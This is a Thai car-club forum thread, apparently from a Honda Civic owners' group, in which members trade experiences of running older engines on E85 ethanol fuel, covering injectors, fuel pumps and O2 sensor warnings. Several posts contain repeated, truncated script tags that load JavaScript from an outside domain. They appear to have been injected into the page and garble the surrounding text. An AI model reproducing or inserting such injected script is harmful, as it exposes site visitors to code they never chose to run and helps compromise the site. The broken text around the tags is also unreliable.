ตอบ
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 2 กุมภา 2013 20:16 - ผมเติม E85 เพียวๆเลยครับ
GPSfaith พิมพ์ว่า:
ผมเติม E85 เพียวๆเลยครับ

ใช้toyotaครับ แต่ขออนุญาตเข้ามาจอยในนี้ด้วยคนครับ คึกคักดี และผมก็เป็นคนที่ชอบเรื่องพลังงานทางเลือกด้วย
หาข้อมูลอยู่พักนึงแล้วครับเกี่ยวกับ E85 ก็กล้าๆกลัวๆ แต่กระทู้นี้เป็นอีกกระทู้นึงที่ทำให้กล้าลองมากขึ้นครับ
ไม่ติดกล่อง ไม่ทำอะไรเพิ่ม ตอนนี้เติมE85 กับ E10 อยู่ประมาณ 40/60 ทุกอย่างปกติดี
จะค่อยๆเติมจนเป็นE85 100%ครับ



<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ รถตัวเองเต็มถังเท่าไรอ่ะ
GPSfaith


เข้าร่วม: 01 กุมภา 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0
เสาร์, 2 กุมภา 2013 22:10 - ผมเติม E85 เพียวๆเลยครับ
sanyaaa พิมพ์ว่า:

GPSfaith พิมพ์ว่า:
ผมเติม E85 เพียวๆเลยครับ

ใช้toyotaครับ แต่ขออนุญาตเข้ามาจอยในนี้ด้วยคนครับ คึกคักดี และผมก็เป็นคนที่ชอบเรื่องพลังงานทางเลือกด้วย
หาข้อมูลอยู่พักนึงแล้วครับเกี่ยวกับ E85 ก็กล้าๆกลัวๆ แต่กระทู้นี้เป็นอีกกระทู้นึงที่ทำให้กล้าลองมากขึ้นครับ
ไม่ติดกล่อง ไม่ทำอะไรเพิ่ม ตอนนี้เติมE85 กับ E10 อยู่ประมาณ 40/60 ทุกอย่างปกติดี
จะค่อยๆเติมจนเป็นE85 100%ครับ



<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ รถตัวเองเต็มถังเท่าไรอ่ะ




ตามสเป็คเค้าว่า65ลิตร แต่ตอนนี้ผมคุยกะรุ่นพี่คนนึงใช้E85มาเกือบ2ปี เพียวมาตลอด แต่ตอนนี้กลับไปใช้E20แทนแล้ว
โดยให้เหตผลว่า85มันเผาเร็วไปหน่อยถ้าวิ่งในเมืองรถติดๆยิ่งเผาหมดไวจนอัตราส่วนราคาขยับมาใกล้E20เลยกลับไปใช้
E20เหมือนเดิมเพื่อการออกตัวที่ดีกว่า ส่วนตัวของผมอยากทำสถิติE85วิ่งคู่มอเตอร์ไฟฟ้า รูปด้านล่างสถิติ E10 91 20 โล/ลิตร
ผมเติม E85 เพียวๆเลยครับ
ได้รับคำขอบคุณจาก: okuma  honeybeex7 
aon3160


ชื่อเล่น: อ้น

เข้าร่วม: 28 มีนา 2012
ตอบ: 222

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 97

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 3 กุมภา 2013 09:21 - ผมเติม E85 เพียวๆเลยครับ
เห็นด้วยกับ E85 ในเมืองเผาเร็วไปหน่อย แต่ก็เติมบ่อยได้โดยไม่ต้องกังวล เพราะราคามันถูกกว่าจน เร้าใจ 

ว้าว! 20 โลลิตร ก็ประหยัดสุด ๆ แล้ว Hybrid + E85 ได้เท่าไหร่ รายงานด้วยคร๊าบ
pai_ana


เข้าร่วม: 24 สิงหา 2011
ตอบ: 283

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 93

ที่อยู่: พัทยา-ชลบุรี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 3 กุมภา 2013 14:32 - ผมเติม E85 เพียวๆเลยครับ
anglo พิมพ์ว่า:
pai_ana พิมพ์ว่า:
Exi 2002  เดือนกุมภาพันธ์นี้จะครบปีแล้วครับ เปลี่ยนแค่หัวเทียนเข็ม ปั๊มติ๊กเจ ประหยัดเดือนละ 2 - 3 พัน คุ้มมาก ขอบคุณ E85 มากๆ 



ผมก็เพิ่งเปลี่ยนปั๊มติ๊กมาสดๆ ร้อนๆ ครับ (แต่เป็นรุ่นเดิมติดรถ)

รอดูอาการครับ จะมารายงานให้ทราบเ็ป็นระยะๆ


ปั๊มติ๊กรุ่นเดิมความดันมันน้อยกว่า ของเจคับบ แล้วแรงดันของเจมันมาเต็มเลย
ของเดิมมันจะค่อยๆขึ้น
GPSfaith


เข้าร่วม: 01 กุมภา 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0
อาทิตย์, 3 กุมภา 2013 15:30 - ผมเติม E85 เพียวๆเลยครับ
aon3160 พิมพ์ว่า:
เห็นด้วยกับ E85 ในเมืองเผาเร็วไปหน่อย แต่ก็เติมบ่อยได้โดยไม่ต้องกังวล เพราะราคามันถูกกว่าจน เร้าใจ 

ว้าว! 20 โลลิตร ก็ประหยัดสุด ๆ แล้ว Hybrid + E85 ได้เท่าไหร่ รายงานด้วยคร๊าบ






20 โล/ลิตร ทำได้เฉพาะในเมืองที่รถไม่ติดหรือแค่ติดไฟแดงและใช้ความเร็วค่อนข้างต่ำครับ ถ้าวิ่งเหยียบๆหยุดๆติดนานๆ
มันชาร์ตแบตไม่ทัน ก็ได้แค่ 8-9โล/ลิตร นอกเมืองประมาณ 16-17โล/ลิตร ใช้E10 91 ตกอยู่ปรมาณ 2.2บาท/โล
จากการคาดเดาถ้าวิ่งE85เพียว อาจได้1.8บาท/โล อยากหาที่ขายน้ำมันเก่าอยู่เนี่ยครับ
aon3160


ชื่อเล่น: อ้น

เข้าร่วม: 28 มีนา 2012
ตอบ: 222

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 236
ให้คำขอบคุณ: 97

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 3 กุมภา 2013 19:30 - ผมเติม E85 เพียวๆเลยครับ
GPSfaith พิมพ์ว่า:
aon3160 พิมพ์ว่า:
เห็นด้วยกับ E85 ในเมืองเผาเร็วไปหน่อย แต่ก็เติมบ่อยได้โดยไม่ต้องกังวล เพราะราคามันถูกกว่าจน เร้าใจ 

ว้าว! 20 โลลิตร ก็ประหยัดสุด ๆ แล้ว Hybrid + E85 ได้เท่าไหร่ รายงานด้วยคร๊าบ






20 โล/ลิตร ทำได้เฉพาะในเมืองที่รถไม่ติดหรือแค่ติดไฟแดงและใช้ความเร็วค่อนข้างต่ำครับ ถ้าวิ่งเหยียบๆหยุดๆติดนานๆ
มันชาร์ตแบตไม่ทัน ก็ได้แค่ 8-9โล/ลิตร นอกเมืองประมาณ 16-17โล/ลิตร ใช้E10 91 ตกอยู่ปรมาณ 2.2บาท/โล
จากการคาดเดาถ้าวิ่งE85เพียว อาจได้1.8บาท/โล อยากหาที่ขายน้ำมันเก่าอยู่เนี่ยครับ



งั้นก็ต้องลองวิ่ง E85 เพียว ดูครับ ว่าได้กี่กิโล/ลิตร เพราะในคลับนี้ หลายท่าน เดิม ๆ ก็เติมแล้ววิ่งได้เลยครับ  
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 4 กุมภา 2013 00:02 - ผมเติม E85 เพียวๆเลยครับ
สมชาย พิมพ์ว่า:

yo555 พิมพ์ว่า:

สมชาย พิมพ์ว่า:

aon3160 พิมพ์ว่า:
มาการันตีอีก 1 เสียง เดิม ๆ เติมได้หมดครับ ทั้ง VTEC และ EXI  เดือนมีนาคม 2556 ที่จะถึงนี้ ผมก็เติมครบปีแล้วครับ  

ถูก และ ดี มีที่ไหน 


งั้นเดียวลองดูครับ ถ้าพังก้อลากเข้าอู่

คุณสมชายมาให้ทีมงานDIYจัดการซะดีๆครับ.....ESชลเราจัดการได้ครับลองปรึกษาพี่โยดูครับ...วันนี้ก้อเพิ่งจัดให้พี่จ๊อปไปอีก1คันครับ
อยากได้สเต็ปไหนบอกล๊วกเพี๊ยกเราได้เลยยย


จัดการอารายสเต็ปแบบไหนหลอครับ ที่ว่าเนี้ย 


แล้วแต่ท่านเลยครับว่าจะเน้นประหยัดหรือว่าจะเน้นซิ่งครับ
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 4 กุมภา 2013 11:06 - ผมเติม E85 เพียวๆเลยครับ
ของผมเต็มถังได้ 300 km เอง ขนาดใช้ล้อ 15 forged ด้วยนะเนี่ย
GPSfaith


เข้าร่วม: 01 กุมภา 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0
จันทร์, 4 กุมภา 2013 13:45 - ผมเติม E85 เพียวๆเลยครับ
lkki5 พิมพ์ว่า:
ของผมเต็มถังได้ 300 km เอง ขนาดใช้ล้อ 15 forged ด้วยนะเนี่ย




300km น้อยมากเลย วิ่งแต่ในเมืองรถติดเยอะ เหยียบหยุดๆ ใช่ไหมครับ
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 กุมภา 2013 14:05 - ผมเติม E85 เพียวๆเลยครับ
pai_ana พิมพ์ว่า:

anglo พิมพ์ว่า:

pai_ana พิมพ์ว่า:
Exi 2002  เดือนกุมภาพันธ์นี้จะครบปีแล้วครับ เปลี่ยนแค่หัวเทียนเข็ม ปั๊มติ๊กเจ ประหยัดเดือนละ 2 - 3 พัน คุ้มมาก ขอบคุณ E85 มากๆ 



ผมก็เพิ่งเปลี่ยนปั๊มติ๊กมาสดๆ ร้อนๆ ครับ (แต่เป็นรุ่นเดิมติดรถ)

รอดูอาการครับ จะมารายงานให้ทราบเ็ป็นระยะๆ


ปั๊มติ๊กรุ่นเดิมความดันมันน้อยกว่า ของเจคับบ แล้วแรงดันของเจมันมาเต็มเลย
ของเดิมมันจะค่อยๆขึ้น



ใส่กันได้เลย หรือว่าต้องดัดแปลงครับ แอบเซ็งเลย...
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
จันทร์, 4 กุมภา 2013 17:21 - ผมเติม E85 เพียวๆเลยครับ
GPSfaith พิมพ์ว่า:

lkki5 พิมพ์ว่า:
ของผมเต็มถังได้ 300 km เอง ขนาดใช้ล้อ 15 forged ด้วยนะเนี่ย




300km น้อยมากเลย วิ่งแต่ในเมืองรถติดเยอะ เหยียบหยุดๆ ใช่ไหมครับ




ตอบ เปลี่ยนหัวฉีดโต 400 cc up พ่วงกล่องfcon ความเร็ว 120-160-180 ครับ เหยียบคันเร่งทีเข็มกระดิกเลยล่ะ
ปล.เอาไว้ซิ่งอย่างเดียว


แก้ไขล่าสุดโดย เมื่อ อังคาร, 5 กุมภา 2013 10:44, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 5 กุมภา 2013 02:12 - ผมเติม E85 เพียวๆเลยครับ
anglo พิมพ์ว่า:

pai_ana พิมพ์ว่า:

anglo พิมพ์ว่า:

pai_ana พิมพ์ว่า:
Exi 2002  เดือนกุมภาพันธ์นี้จะครบปีแล้วครับ เปลี่ยนแค่หัวเทียนเข็ม ปั๊มติ๊กเจ ประหยัดเดือนละ 2 - 3 พัน คุ้มมาก ขอบคุณ E85 มากๆ 



ผมก็เพิ่งเปลี่ยนปั๊มติ๊กมาสดๆ ร้อนๆ ครับ (แต่เป็นรุ่นเดิมติดรถ)

รอดูอาการครับ จะมารายงานให้ทราบเ็ป็นระยะๆ


ปั๊มติ๊กรุ่นเดิมความดันมันน้อยกว่า ของเจคับบ แล้วแรงดันของเจมันมาเต็มเลย
ของเดิมมันจะค่อยๆขึ้น



ใส่กันได้เลย หรือว่าต้องดัดแปลงครับ แอบเซ็งเลย...

ได้เลยครับ....แต่ที่ได้มาไม่ได้ใช้ทั้งหมดครับ...เดี๋ยวเอาไว้DIYคั้นหน้าจะให้ทีมงานเอารูปมาลงให้ดูอย่างละเอียดเพื่อเปนแนวทางครับ
***วันก่อนเพิ่งเปลี่ยนทำกันเร็วมาก..มัวแต่ห่วงคนดูดบุรีเลยลืมถ่ายรูปเลย55
ได้รับคำขอบคุณจาก: สมชาย 
A_CIVIC


ชื่อเล่น: เอ

เข้าร่วม: 04 ตุลา 2008
ตอบ: 196

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 88
ให้คำขอบคุณ: 92

ที่อยู่: อ้อมน้อย-สาย5
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 5 กุมภา 2013 11:11 - ผมเติม E85 เพียวๆเลยครับ
jjim พิมพ์ว่า:
เดี๋ยวไปจัดสักถัง 1 ลองดูบ้าง <script src="https://sport32news.com/civicesgroup.js"></

E85+LPG


ลองมั่งดีกว่า
ได้รับคำขอบคุณจาก: สมชาย 
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 5 กุมภา 2013 11:49 - ผมเติม E85 เพียวๆเลยครับ
yo555 พิมพ์ว่า:
anglo พิมพ์ว่า:

pai_ana พิมพ์ว่า:

anglo พิมพ์ว่า:

pai_ana พิมพ์ว่า:
Exi 2002  เดือนกุมภาพันธ์นี้จะครบปีแล้วครับ เปลี่ยนแค่หัวเทียนเข็ม ปั๊มติ๊กเจ ประหยัดเดือนละ 2 - 3 พัน คุ้มมาก ขอบคุณ E85 มากๆ 



ผมก็เพิ่งเปลี่ยนปั๊มติ๊กมาสดๆ ร้อนๆ ครับ (แต่เป็นรุ่นเดิมติดรถ)

รอดูอาการครับ จะมารายงานให้ทราบเ็ป็นระยะๆ


ปั๊มติ๊กรุ่นเดิมความดันมันน้อยกว่า ของเจคับบ แล้วแรงดันของเจมันมาเต็มเลย
ของเดิมมันจะค่อยๆขึ้น



ใส่กันได้เลย หรือว่าต้องดัดแปลงครับ แอบเซ็งเลย...

ได้เลยครับ....แต่ที่ได้มาไม่ได้ใช้ทั้งหมดครับ...เดี๋ยวเอาไว้DIYคั้นหน้าจะให้ทีมงานเอารูปมาลงให้ดูอย่างละเอียดเพื่อเปนแนวทางครับ
***วันก่อนเพิ่งเปลี่ยนทำกันเร็วมาก..มัวแต่ห่วงคนดูดบุรีเลยลืมถ่ายรูปเลย55



ล่าสุด...หลังจากเปลี่ยนปั๊มติ๊กรุ่นเดิม

เครื่องเดินเรียบขึ้นเห็นได้ชัดเลยครับ แต่ไฟเครื่องยังโชว์ ตอนสตาร์ทเครื่องเย็นอยู่

ล่าสุดให้ช่างเช็คไฟโชว์ให้ ฟ้อง O2 sensor (งานงอกอีกแล้วตรู)

เห็นช่างบอกว่า มันจะมี 2 ตัว แต่ที่ฟ้อง คือ ตัวเดียว ไม่ทราบราคาของเช็คอยู่ที่ประมาณเท่าไหร่ครับ?
ได้รับคำขอบคุณจาก: สมชาย 
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 5 กุมภา 2013 16:13 - ผมเติม E85 เพียวๆเลยครับ
Update ล่าสุด

หลังจากเช็คไฟโชว์และทราบว่า O2 sensor ตัวที่ 1 มีปัญหา

ทางร้านลองหา O2 มือสองมาเปลี่ยน ปรากฎว่า อาการแรงกว่าเดิม จึงใส่ตัวเดิมกลับคืน

ช่างถามผมว่า น้ำมันที่ใช้ น้ำมันอะไร ผมบอกว่าเติม E85

เท่านั้นแหละ....ทุกอย่างจบเลย เพราะัปัญหา คือ E85

เย็นนี้รับรถได้เลย 55+

ไปรับรถเย็นนี้จะลองไปถามดู ว่าขอเปลี่ยนปั๊มติ๊กเดิม(ที่เปลี่ยนใหม่ให้โดยที่ไม่โทรแจ้งผมก่อน) เป็นปั๊มติ๊กเจ ได้หรือเปล่า? 

ปล.ช่างไม่ยอมล้างลิ้นปีกผีเสื้อให้ครับ เขาบอกว่า ยังดีอยู่ 

ปล2.ความเห็นส่วนตัว ผมไม่อยากพ่วงกล่อง แต่อยากแก้ไขในส่วนที่ต้องแก้ เพื่อที่จะได้ใช้ E85 อย่างสบายใจ ไม่ต้องง้อกล่อง
(แต่ถ้ามันหมดหนทางแล้ว ก็อาจจะต้องยอม กับกล่องตัวละ 8,000)
ได้รับคำขอบคุณจาก: yo555  สมชาย 
artoasis


ชื่อเล่น: อาร์ท

เข้าร่วม: 03 ตุลา 2008
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 108

ที่อยู่: BKK
ปี: 2001
อังคาร, 5 กุมภา 2013 22:48 - ผมเติม E85 เพียวๆเลยครับ
เปลี่ยนหัวฉีด K20A มาใช้ใน D17 แค่นั้นก็ใช้ E85 ได้แบบสบายใจแล้วครับ ไม่ต้องจูนกล่องครับ เพราะกล่อง ECU ตรวจอัตราส่วนผสมแบบ Lambda =1 ใช้น้ำมันเบนซินอะไรก็ได้เดี๋ยว ECU ก็ปรับเข้าหาค่าเอง แต่อุปกรณ์ต้องถึงด้วยนะ เช่นการขยายหัวฉีดที่มี cc เยอะขึ้น
พอจ่ายมากเกินเดี๋ยว ECU จะปรับลดให้เอง (หัวฉีดต้องอยู่ใน rank ที่รับได้ด้วยนะ) ส่วนเรื่ององศาไฟ ECU ก็เพียงแค่ปรับชดเชยให้เท่านั้น
ไม่ใช่องศาไฟที่ดีที่สุด แต่ใช้ได้เพราะเครื่อง D17 มี knock sensor ครับ


ทุกวันนี้ที่ไฟ Engine โชว์ ก็เพราะ ECU สั่งยกหัวฉีดจนสุดแล้วครับ ก็ยังไม่สามารถทำให้ส่วนผสมไปหาค่า Lambda=1 ได้ มันจึงขึ้นไฟเตือนครับ
ใช้ไปนาน หัวฉีดยกค้างก็พังอีกครับ


หัวเทียนไม่ใช่ประเด็นครับ เพียงแต่เราสามารถสังเกตอัตราส่วนผสมว่าหนาหรือบางได้จากสีของหัวเทียนครับ เปลี่ยนใหม่ก็เป็นอีกครับ หัวเทียนมันไม่พังหรอกครับ

1. สตาร์ทยากเพราะน้ำมันลงไม่พอ และ E85 ก็ลามไฟช้าอยู่แล้ว
2. O2 เซนเซอร์ไม่ได้เสีย แต่ที่ไฟโชว์ก็เพราะอัตราส่วนผสมบางเกินครับ
3. เปลี่ยนปั๊มติ๊กให้แรงขึ้น ใช่ครับเพราะ Flowrate จะเพิ่มขึ้นแต่สุดท้ายก็โดนควบคุมโดยเรกูเลเตอร์ครับ เลยยังไม่ตรงประเด็น
4. ท่อยางใช่ครับตามที่ผมเคยพิมพ์ไว้ ถ้ามีเวลาก็เปลี่ยนครับ แต่ของเดิมก็ใช่ว่าจะพังง่ายครับ ทนพอตัว


ผมเข้าใจนะครับว่ามันใช้ได้ แต่มันใช้ได้ไม่ดีครับ ถ้าทำแบบที่ผมบอก รถคุณจะแรงขึ้นเองโดยไม่ตั้งใจและประหยัดแบบสมเหตุสมผลไม่ต้องเสี่ยงปัญหาเครื่องพัง ผมรู้ว่าท่านอาจจะบอกว่าไม่ต้องการความแรง เพียงแค่ต้องการประหยัด เข้าใจครับเพียงแต่ผมอยากให้ท่านทั้งหลายใช้ให้ถูกตามหลักทฤษฎี และถูกเงินที่สุด สิ่งที่ได้มาท่านจะได้มาเองมันเป็นสิ่งที่ได้ฟรีมาจากน้ำมันครับ


ด้วยความเคารพนะครับ คืออ่านมานานแล้วครับ เห็นหลายๆท่านเกิดปัญหาจึงอดไม่ได้ที่จะพิมพ์อีกครั้งครับ

จะเชื่อหรือไม่ อันนี้ก็แล้วแต่ท่านสมาชิกครับผม
ได้รับคำขอบคุณจาก: yo555  phichetza  สมชาย  anglo  lkki5  honeybeex7  chaichan  TIRL_ES  earnee33  adisak 
nekimaja


ชื่อเล่น: เอ็ม

เข้าร่วม: 21 ธันวา 2012
ตอบ: 72

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 25
ให้คำขอบคุณ: 6

ที่อยู่: สมุทรปราการ
อังคาร, 5 กุมภา 2013 23:45 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:
เปลี่ยนหัวฉีด K20A มาใช้ใน D17 แค่นั้นก็ใช้ E85 ได้แบบสบายใจแล้วครับ ไม่ต้องจูนกล่องครับ เพราะกล่อง ECU ตรวจอัตราส่วนผสมแบบ Lambda =1 ใช้น้ำมันเบนซินอะไรก็ได้เดี๋ยว ECU ก็ปรับเข้าหาค่าเอง แต่อุปกรณ์ต้องถึงด้วยนะ เช่นการขยายหัวฉีดที่มี cc เยอะขึ้น
พอจ่ายมากเกินเดี๋ยว ECU จะปรับลดให้เอง (หัวฉีดต้องอยู่ใน rank ที่รับได้ด้วยนะ) ส่วนเรื่ององศาไฟ ECU ก็เพียงแค่ปรับชดเชยให้เท่านั้น
ไม่ใช่องศาไฟที่ดีที่สุด แต่ใช้ได้เพราะเครื่อง D17 มี knock sensor ครับ


ทุกวันนี้ที่ไฟ Engine โชว์ ก็เพราะ ECU สั่งยกหัวฉีดจนสุดแล้วครับ ก็ยังไม่สามารถทำให้ส่วนผสมไปหาค่า Lambda=1 ได้ มันจึงขึ้นไฟเตือนครับ
ใช้ไปนาน หัวฉีดยกค้างก็พังอีกครับ


หัวเทียนไม่ใช่ประเด็นครับ เพียงแต่เราสามารถสังเกตอัตราส่วนผสมว่าหนาหรือบางได้จากสีของหัวเทียนครับ เปลี่ยนใหม่ก็เป็นอีกครับ หัวเทียนมันไม่พังหรอกครับ

1. สตาร์ทยากเพราะน้ำมันลงไม่พอ และ E85 ก็ลามไฟช้าอยู่แล้ว
2. O2 เซนเซอร์ไม่ได้เสีย แต่ที่ไฟโชว์ก็เพราะอัตราส่วนผสมบางเกินครับ
3. เปลี่ยนปั๊มติ๊กให้แรงขึ้น ใช่ครับเพราะ Flowrate จะเพิ่มขึ้นแต่สุดท้ายก็โดนควบคุมโดยเรกูเลเตอร์ครับ เลยยังไม่ตรงประเด็น
4. ท่อยางใช่ครับตามที่ผมเคยพิมพ์ไว้ ถ้ามีเวลาก็เปลี่ยนครับ แต่ของเดิมก็ใช่ว่าจะพังง่ายครับ ทนพอตัว


ผมเข้าใจนะครับว่ามันใช้ได้ แต่มันใช้ได้ไม่ดีครับ ถ้าทำแบบที่ผมบอก รถคุณจะแรงขึ้นเองโดยไม่ตั้งใจและประหยัดแบบสมเหตุสมผลไม่ต้องเสี่ยงปัญหาเครื่องพัง ผมรู้ว่าท่านอาจจะบอกว่าไม่ต้องการความแรง เพียงแค่ต้องการประหยัด เข้าใจครับเพียงแต่ผมอยากให้ท่านทั้งหลายใช้ให้ถูกตามหลักทฤษฎี และถูกเงินที่สุด สิ่งที่ได้มาท่านจะได้มาเองมันเป็นสิ่งที่ได้ฟรีมาจากน้ำมันครับ


ด้วยความเคารพนะครับ คืออ่านมานานแล้วครับ เห็นหลายๆท่านเกิดปัญหาจึงอดไม่ได้ที่จะพิมพ์อีกครั้งครับ

จะเชื่อหรือไม่ อันนี้ก็แล้วแต่ท่านสมาชิกครับผม

ชัดเจนแจ่มแจ้งตามนั้นคับ จะบอกว่าคันมือเลยต้องพิมพ์ใช่ไหมล่ะคับ 555+ วิ่งได้กับวิ่งดีคนละอย่างกัน ส่วนตัวผมเปลี่ยนหัวฉีดกับเร็กกูเรเตอร์ไปก็วิ่งดีกว่าเดิมเยอะ แต่อาการตอนสตาร์ทยังยากอยู่ ต้องเร่งช่วย เดินเบาไม่นิ่ง เพิ่งมาเป็นตอนอากาศเย็นๆนี่ล่ะ ว่าจะขอคำปรึกษาสักหน่อยคับ
ได้รับคำขอบคุณจาก: yo555  สมชาย 
GPSfaith


เข้าร่วม: 01 กุมภา 2013
ตอบ: 10

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0
อังคาร, 5 กุมภา 2013 23:53 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:
เปลี่ยนหัวฉีด K20A มาใช้ใน D17 แค่นั้นก็ใช้ E85 ได้แบบสบายใจแล้วครับ ไม่ต้องจูนกล่องครับ เพราะกล่อง ECU ตรวจอัตราส่วนผสมแบบ Lambda =1 ใช้น้ำมันเบนซินอะไรก็ได้เดี๋ยว ECU ก็ปรับเข้าหาค่าเอง แต่อุปกรณ์ต้องถึงด้วยนะ เช่นการขยายหัวฉีดที่มี cc เยอะขึ้น
พอจ่ายมากเกินเดี๋ยว ECU จะปรับลดให้เอง (หัวฉีดต้องอยู่ใน rank ที่รับได้ด้วยนะ) ส่วนเรื่ององศาไฟ ECU ก็เพียงแค่ปรับชดเชยให้เท่านั้น
ไม่ใช่องศาไฟที่ดีที่สุด แต่ใช้ได้เพราะเครื่อง D17 มี knock sensor ครับ


ทุกวันนี้ที่ไฟ Engine โชว์ ก็เพราะ ECU สั่งยกหัวฉีดจนสุดแล้วครับ ก็ยังไม่สามารถทำให้ส่วนผสมไปหาค่า Lambda=1 ได้ มันจึงขึ้นไฟเตือนครับ
ใช้ไปนาน หัวฉีดยกค้างก็พังอีกครับ


หัวเทียนไม่ใช่ประเด็นครับ เพียงแต่เราสามารถสังเกตอัตราส่วนผสมว่าหนาหรือบางได้จากสีของหัวเทียนครับ เปลี่ยนใหม่ก็เป็นอีกครับ หัวเทียนมันไม่พังหรอกครับ

1. สตาร์ทยากเพราะน้ำมันลงไม่พอ และ E85 ก็ลามไฟช้าอยู่แล้ว
2. O2 เซนเซอร์ไม่ได้เสีย แต่ที่ไฟโชว์ก็เพราะอัตราส่วนผสมบางเกินครับ
3. เปลี่ยนปั๊มติ๊กให้แรงขึ้น ใช่ครับเพราะ Flowrate จะเพิ่มขึ้นแต่สุดท้ายก็โดนควบคุมโดยเรกูเลเตอร์ครับ เลยยังไม่ตรงประเด็น
4. ท่อยางใช่ครับตามที่ผมเคยพิมพ์ไว้ ถ้ามีเวลาก็เปลี่ยนครับ แต่ของเดิมก็ใช่ว่าจะพังง่ายครับ ทนพอตัว


ผมเข้าใจนะครับว่ามันใช้ได้ แต่มันใช้ได้ไม่ดีครับ ถ้าทำแบบที่ผมบอก รถคุณจะแรงขึ้นเองโดยไม่ตั้งใจและประหยัดแบบสมเหตุสมผลไม่ต้องเสี่ยงปัญหาเครื่องพัง ผมรู้ว่าท่านอาจจะบอกว่าไม่ต้องการความแรง เพียงแค่ต้องการประหยัด เข้าใจครับเพียงแต่ผมอยากให้ท่านทั้งหลายใช้ให้ถูกตามหลักทฤษฎี และถูกเงินที่สุด สิ่งที่ได้มาท่านจะได้มาเองมันเป็นสิ่งที่ได้ฟรีมาจากน้ำมันครับ


ด้วยความเคารพนะครับ คืออ่านมานานแล้วครับ เห็นหลายๆท่านเกิดปัญหาจึงอดไม่ได้ที่จะพิมพ์อีกครั้งครับ

จะเชื่อหรือไม่ อันนี้ก็แล้วแต่ท่านสมาชิกครับผม




